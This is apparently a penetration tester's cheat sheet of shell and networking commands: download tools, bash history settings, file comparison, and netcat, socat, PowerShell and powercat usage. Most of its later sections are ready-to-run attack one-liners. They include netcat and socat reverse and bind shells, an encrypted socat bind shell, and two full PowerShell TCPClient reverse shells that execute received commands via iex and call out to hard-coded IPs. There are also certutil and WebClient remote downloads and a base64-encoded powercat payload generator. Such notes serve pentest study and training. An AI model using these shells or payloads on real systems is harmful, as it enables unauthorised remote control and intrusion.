Important Commands
Download
wget or curl will grab files, but axel (multipart download) opens several parallel connections for one file and speeds up large downloads considerably:
axel -a -n 20 -o file.ext http://host/file.ext

Download using certutil
certutil -urlcache -split -f http://10.0.0.1/download/jsextension.exe jsextension.exe

History
Ignore duplicate entries (ignoredups; ignoreboth additionally drops commands typed with a leading space):
export HISTCONTROL=ignoredups
Ignore commands that are run frequently:
export HISTIGNORE="&:ls:[bf]g:exit:history"
History time format:
export HISTTIMEFORMAT='%F %T '
File Comparison
comm compares two sorted text files:
comm scan-a.txt scan-b.txt
It prints three columns: lines only in the first file, lines only in the second file, and lines shared by both (the last column). Columns named after the dash are suppressed, so -12 hides columns 1 and 2 and leaves only the shared lines:
comm -12 scan-a.txt scan-b.txt
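As an added example (not part of the original notes), the three comm selections run over two constructed scan-result files; it also shows the sort step comm needs, which the one-liner above assumes:

```shell
#!/bin/bash
# Added example: compare two constructed host lists with comm.
# comm only works on sorted input, so each file is sorted and
# deduplicated before comparison.

work=$(mktemp -d)
trap 'rm -rf "$work"' EXIT

# Constructed sample data: an earlier and a later scan, deliberately unsorted.
printf '10.0.0.5\n10.0.0.2\n10.0.0.9\n' > "$work/scan-a.txt"
printf '10.0.0.2\n10.0.0.7\n10.0.0.9\n10.0.0.5\n' > "$work/scan-b.txt"

sort -u -o "$work/scan-a.txt" "$work/scan-a.txt"
sort -u -o "$work/scan-b.txt" "$work/scan-b.txt"

# Column 1 = only in scan-a, column 2 = only in scan-b, column 3 = in both.
# -12 suppresses columns 1 and 2: hosts present in both scans.
shared()    { comm -12 "$work/scan-a.txt" "$work/scan-b.txt"; }
# -23 suppresses columns 2 and 3: hosts that disappeared since scan-a.
only_in_a() { comm -23 "$work/scan-a.txt" "$work/scan-b.txt"; }
# -13 suppresses columns 1 and 3: hosts that are new in scan-b.
only_in_b() { comm -13 "$work/scan-a.txt" "$work/scan-b.txt"; }

echo "shared:";  shared
echo "removed:"; only_in_a
echo "new:";     only_in_b
```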
diff supports many output formats: context format (-c) and unified format (-u).
vimdiff shows the two files side by side in two columns.

Tail
Output the last 2 lines of a file:
tail -n2 /var/log/apache.log

Aliases
Aliases replace a command with a shorter one:
alias lsa='ls -la'

Bash
/etc/bash.bashrc: system-wide bash settings applied to any user on login.
Netcat
Connect to a port / listen on a port:
nc -v -n ip port
nc -nvlp 5555
Transfer a file with netcat (receiving side first, then the sending side):
nc -nlvp 4444 > file.exe
remote side: nc -nv ip 4444 < /location_of_file
Bind shell (the listening side runs the shell; the other side connects to it):
nc -nlvp 4444 -e cmd.exe
nc -nv ip 4444
Reverse shell (the connecting side runs the shell; the listener receives it):
nc -nv ip 4444 -e /bin/bash
nc -nlvp 4444

Socat
Connect to a port:
socat - TCP4:ip:port
Listener:
sudo socat TCP4-LISTEN:443 STDOUT
Reverse shell (listener first, then the connecting side):
socat -d -d TCP4-LISTEN:443 STDOUT
socat TCP4:ip:port EXEC:/bin/bash
Encrypted bind shell (listener first, then the client; verify=0 disables certificate checking on both ends):
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
socat - OPENSSL:ip:port,verify=0
Powershell
set-executionpolicy unrestricted
Get-ExecutionPolicy
Transferring a file:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://ip/wget.exe','C:\temp\wget.exe')"
Reverse shell (connects out with TCPClient and runs each received line through iex, sending the output back):
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush(); } $client.Close();
Bind shell:
Note: as written, this one-liner also uses TCPClient to connect out to 192.168.254.1:4444, so it is a second reverse shell with a 256-byte read buffer rather than a listener.
$client = New-Object System.Net.Sockets.TCPClient("192.168.254.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Powercat
The PowerShell version of netcat; it simplifies the creation of bind and reverse shells.
File transfer:
powercat -c ip -p 443 -i c:\location\powercat.ps1
Simple reverse shell (powercat connects out; nc is the listener):
powercat -c ip -p 443 -e cmd.exe
nc -lvp 443
Powercat bind shell (powercat listens; nc connects to it):
powercat -l -p 443 -e cmd.exe
nc -nv ip 443
Powercat standalone payloads (-ge writes the command base64-encoded, which powershell -E then runs):
powercat -c ip -p 443 -e cmd.exe -ge > reverse.ps1
powershell -E base64